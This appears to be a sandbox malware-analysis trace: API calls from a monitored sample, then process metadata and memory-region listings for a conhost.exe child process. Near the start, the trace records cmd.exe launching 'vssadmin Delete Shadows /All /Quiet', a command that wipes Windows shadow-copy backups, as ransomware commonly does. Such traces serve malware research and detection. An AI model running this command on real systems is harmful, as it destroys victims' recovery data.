	[0240.288] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x18) returned 0x4727918
	[0240.288] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0240.289] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0240.290] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0240.291] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0240.291] GetProcessHeap () returned 0x4720000
	[0240.291] RtlFreeHeap (HeapHandle=0x4720000, Flags=0x0, BaseAddress=0x4727918) returned 1
	[0240.291] GetProcessHeap () returned 0x4720000
	[0240.291] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0xa) returned 0x4729558
	[0240.292] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0240.297] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=V: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f210*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=V: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f25c | out: lpCommandLine="vssadmin  Delete Shadows /For=V: /All /Quiet ", lpProcessInformation=0x18f25c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x56c, dwThreadId=0x5c0)) returned 1
	[0240.323] CloseHandle (hObject=0xa4) returned 1
	[0240.323] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0240.323] GetProcessHeap () returned 0x4720000
	[0240.323] RtlFreeHeap (HeapHandle=0x4720000, Flags=0x0, BaseAddress=0x472b858) returned 1
	[0240.323] GetEnvironmentStringsW () returned 0x472a148*
	[0240.323] GetProcessHeap () returned 0x4720000
	[0240.324] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0xb9c) returned 0x472acf0
	[0240.324] memcpy (in: _Dst=0x472acf0, _Src=0x472a148, _Size=0xb9c | out: _Dst=0x472acf0) returned 0x472acf0
	[0240.324] FreeEnvironmentStringsA (penv="=") returned 1
	[0240.324] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0259.066] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f1f4 | out: lpExitCode=0x18f1f4*=0x2) returned 1
	[0259.068] CloseHandle (hObject=0xa8) returned 1
	[0259.069] _vsnwprintf (in: _Buffer=0x18f2dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f1fc | out: _Buffer="00000002") returned 8
	[0259.070] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0259.070] GetProcessHeap () returned 0x4720000
	[0259.071] RtlFreeHeap (HeapHandle=0x4720000, Flags=0x0, BaseAddress=0x472acf0) returned 1
	[0259.071] GetEnvironmentStringsW () returned 0x472a148*
	[0259.071] GetProcessHeap () returned 0x4720000
	[0259.071] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0xbc2) returned 0x472c468
	[0259.071] memcpy (in: _Dst=0x472c468, _Src=0x472a148, _Size=0xbc2 | out: _Dst=0x472c468) returned 0x472c468
	[0259.071] FreeEnvironmentStringsA (penv="=") returned 1
	[0259.072] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0259.072] GetProcessHeap () returned 0x4720000
	[0259.072] RtlFreeHeap (HeapHandle=0x4720000, Flags=0x0, BaseAddress=0x472c468) returned 1
	[0259.072] GetEnvironmentStringsW () returned 0x472a148*
	[0259.072] GetProcessHeap () returned 0x4720000
	[0259.072] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0xbc2) returned 0x472c468
	[0259.072] memcpy (in: _Dst=0x472c468, _Src=0x472a148, _Size=0xbc2 | out: _Dst=0x472c468) returned 0x472c468
	[0259.072] FreeEnvironmentStringsA (penv="=") returned 1
	[0259.072] GetProcessHeap () returned 0x4720000
	[0259.072] RtlFreeHeap (HeapHandle=0x4720000, Flags=0x0, BaseAddress=0x4729558) returned 1
	[0259.072] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f288 | out: lpAttributeList=0x18f288) 
	[0259.073] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0259.073] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0259.302] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0259.302] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0259.513] _get_osfhandle (_FileHandle=0) returned 0x38
	[0259.513] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0260.082] SetConsoleInputExeNameW () returned 0x1
	[0260.082] GetConsoleOutputCP () returned 0x1b5
	[0260.487] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0260.487] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0260.577] exit (_Code=2) 

Thread:
	id = 66
	os_tid = 0xf9c


Process:
	id = "14"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x5e044000"
	os_pid = "0xe98"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "12"
	os_parent_pid = "0x125c"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 930
	        start_va = 0xda00000
	          end_va = 0xdbfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000da00000"
	        filename = ""

Region:
	              id = 931
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 932
	        start_va = 0x774d820000
	          end_va = 0x774d85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000774d820000"
	        filename = ""

Region:
	              id = 933
	        start_va = 0x774da00000
	          end_va = 0x774dbfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000774da00000"
	        filename = ""

Region:
	              id = 934
	        start_va = 0x231a9ea0000
	          end_va = 0x231a9ebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231a9ea0000"
	        filename = ""

Region:
	              id = 935
	        start_va = 0x231a9ec0000
	          end_va = 0x231a9ed4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231a9ec0000"
	        filename = ""

Region:
	              id = 936
	        start_va = 0x7df5ff250000
	          end_va = 0x7ff5ff24ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff250000"
	        filename = ""

Region:
	              id = 937
	        start_va = 0x7ff7fef00000
	          end_va = 0x7ff7fef22fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fef00000"
	        filename = ""

Region:
	              id = 938
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 939
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 940
	        start_va = 0x231a9ee0000
	          end_va = 0x231a9fdffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231a9ee0000"
	        filename = ""

Region:
	              id = 941
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 942
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 954
	        start_va = 0x231a9ea0000
	          end_va = 0x231a9eaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231a9ea0000"
	        filename = ""

Region:
	              id = 955
	        start_va = 0x7ff7fee00000
	          end_va = 0x7ff7feefffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fee00000"
	        filename = ""

Region:
	              id = 956
	        start_va = 0x231a9fe0000
	          end_va = 0x231aa09dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 957
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 958
	        start_va = 0x774d860000
	          end_va = 0x774d89ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000774d860000"
	        filename = ""

Region:
	              id = 959
	        start_va = 0x231aa0a0000
	          end_va = 0x231aa19ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231aa0a0000"
	        filename = ""

Region:
	              id = 960
	        start_va = 0x231a9eb0000
	          end_va = 0x231a9eb6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231a9eb0000"
	        filename = ""

Region:
	              id = 961
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 975
	        start_va = 0x231aa0a0000
	          end_va = 0x231aa0a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa0a0000"
	        filename = ""

Region:
	              id = 976
	        start_va = 0x231aa190000
	          end_va = 0x231aa19ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231aa190000"
	        filename = ""

Region:
	              id = 977
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 978
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 979
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 980
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 981
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 982
	        start_va = 0x231aa0b0000
	          end_va = 0x231aa0b6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231aa0b0000"
	        filename = ""

Region:
	              id = 983
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 984
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1007
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1008
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1009
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1032
	        start_va = 0x231aa0c0000
	          end_va = 0x231aa0c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231aa0c0000"
	        filename = ""

Region:
	              id = 1033
	        start_va = 0x231aa0d0000
	          end_va = 0x231aa0d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231aa0d0000"
	        filename = ""

Region:
	              id = 1034
	        start_va = 0x231aa1a0000
	          end_va = 0x231aa327fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa1a0000"
	        filename = ""

Region:
	              id = 1035
	        start_va = 0x231aa330000
	          end_va = 0x231aa4b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa330000"
	        filename = ""

Region:
	              id = 1036
	        start_va = 0x231aa4c0000
	          end_va = 0x231ab8bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa4c0000"
	        filename = ""

Region:
	              id = 1037
	        start_va = 0x231ab8c0000
	          end_va = 0x231ab9affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ab8c0000"
	        filename = ""

Region:
	              id = 1056
	        start_va = 0x774d8a0000
	          end_va = 0x774d8dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000774d8a0000"
	        filename = ""

Region:
	              id = 1057
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1058
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1059
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1063
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1064
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1065
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1066
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1067
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1068
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1102
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1103
	        start_va = 0x231ab8c0000
	          end_va = 0x231ab98ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ab8c0000"
	        filename = ""

Region:
	              id = 1104
	        start_va = 0x231ab9a0000
	          end_va = 0x231ab9affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ab9a0000"
	        filename = ""

Region:
	              id = 1134
	        start_va = 0x231ab9b0000
	          end_va = 0x231abce6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1135
	        start_va = 0x231aa0e0000
	          end_va = 0x231aa139fff
	       monitored = 1
	     entry_point = 0x231aa0f53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1136
	        start_va = 0x231aa140000
	          end_va = 0x231aa160fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1146
	        start_va = 0x231abcf0000
	          end_va = 0x231abf0efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231abcf0000"
	        filename = ""

Region:
	              id = 1149
	        start_va = 0x231abf10000
	          end_va = 0x231ac126fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231abf10000"
	        filename = ""

Region:
	              id = 1150
	        start_va = 0x231ac130000
	          end_va = 0x231ac23bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ac130000"
	        filename = ""

Region:
	              id = 1151
	        start_va = 0x231ac240000
	          end_va = 0x231ac45efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ac240000"
	        filename = ""

Region:
	              id = 1184
	        start_va = 0x231ac460000
	          end_va = 0x231ac56dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ac460000"
	        filename = ""

Region:
	              id = 1237
	        start_va = 0x774d8e0000
	          end_va = 0x774d91ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000774d8e0000"
	        filename = ""

Region:
	              id = 1238
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1239
	        start_va = 0x231aa0e0000
	          end_va = 0x231aa0e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa0e0000"
	        filename = ""

Region:
	              id = 1240
	        start_va = 0x231ab8c0000
	          end_va = 0x231ab97bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231ab8c0000"
	        filename = ""

Region:
	              id = 1241
	        start_va = 0x231ab980000
	          end_va = 0x231ab98ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231ab980000"
	        filename = ""

Region:
	              id = 1242
	        start_va = 0x231aa0e0000
	          end_va = 0x231aa0e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa0e0000"
	        filename = ""

Region:
	              id = 1243
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1244
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1246
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1253
	        start_va = 0x231aa0f0000
	          end_va = 0x231aa0f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000231aa0f0000"
	        filename = ""

Region:
	              id = 1254
	        start_va = 0x231aa100000
	          end_va = 0x231aa100fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa100000"
	        filename = ""

Region:
	              id = 1255
	        start_va = 0x231aa110000
	          end_va = 0x231aa110fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa110000"
	        filename = ""

Region:
	              id = 1256
	        start_va = 0x231aa120000
	          end_va = 0x231aa124fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1257
	        start_va = 0x231aa130000
	          end_va = 0x231aa130fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1271
	        start_va = 0x231aa140000
	          end_va = 0x231aa141fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa140000"
